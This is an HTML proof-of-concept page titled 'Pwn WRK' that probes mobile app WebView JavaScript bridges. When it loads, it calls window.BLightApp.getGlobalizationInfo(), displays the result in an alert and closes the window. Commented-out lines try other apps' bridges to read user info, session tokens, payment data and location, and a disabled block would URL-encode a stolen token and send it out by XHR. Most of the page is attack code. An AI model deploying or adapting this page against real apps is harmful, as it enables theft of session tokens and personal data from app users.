<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Pwn WRK </title>
</head>
<body>
<p id="content">attackWRK </p>
     
<script>

       function createXHR() {
        if (typeof XMLHttpRequest != 'undefined') {
            return new XMLHttpRequest();
        } else if (typeof ActiveXObject != 'undefined') {
            if (typeof arguments.callee.activeXString != 'string') {
                var versions = ['MSXML2.XMLHttp.6.0', 'MSXML2.XMLHttp.3.0', 'MSXML2.XMLHttp'];
                for (var i = 0; i < versions.length; i++) {
                    try {
                        var xhr = new ActiveXObject(versions[i]);
                        arguments.callee.activeXString = versions[i];
                        return xhr;
                    } catch (ex) {
                    }
                }
            }
            return new ActiveXObject(arguments.callee.activeXString);
        } else {
            throw new Error('No XHR Object available');
        }
    }

    function sendGetRequest(url, callback) {
        var xhr = createXHR();
        xhr.open('GET', url, false);
        xhr.send();
        callback(xhr.responseText);
    }

    function sendRequest(url) {
        sendGetRequest(url, function (response) {
            //document.getElementById("content").innerText = 'cctest : ' + response;
        });
    }
    

    
    
 attackWRK();   
    
 function attackWRK() {
       //window.BLightApp.testInvoke();
       var getUserId4=window.BLightApp.getGlobalizationInfo();
         alert(getUserId4);
    
      alert("1");
    window.BLightApp.closeWindow();
     
 

     
     
 
  // var getUserInfo = window.SPJSBridge.getUserInfo();
  // alert('getUserInfo:'+ getUserInfo);
  // var getUserToken=window.__napos__.getNaposSid();
   //alert(getUserToken);
   //var getUserId=window.__napos__.getNaposRSTid()
   //alert(getUserId);
     
   //  var getUserToken=window.CCNative.getAppInfo();
   //alert(getUserToken);
   //var getUserId=window.CCBridge.getAppInfo();
   //alert(getUserId);
   //var getUserId2=window.intsigBridgeAndroid.getVersion();
   //alert(getUserId2);
    //  var getUserId3=window.payment.getVersion();
   //alert(getUserId3);
     // var getUserId4=window.business_bank_bridge.getLocation();
   //alert(getUserId4);
     
     
     
   //userInfo='getUserToken : ' +getUserToken;
   //document.getElementById("content").innerText = userInfo;
   //url =encodeURIComponent(userInfo);
   //sendRequest(url);
     

     
 } 
     
</script>
</body>
</html>
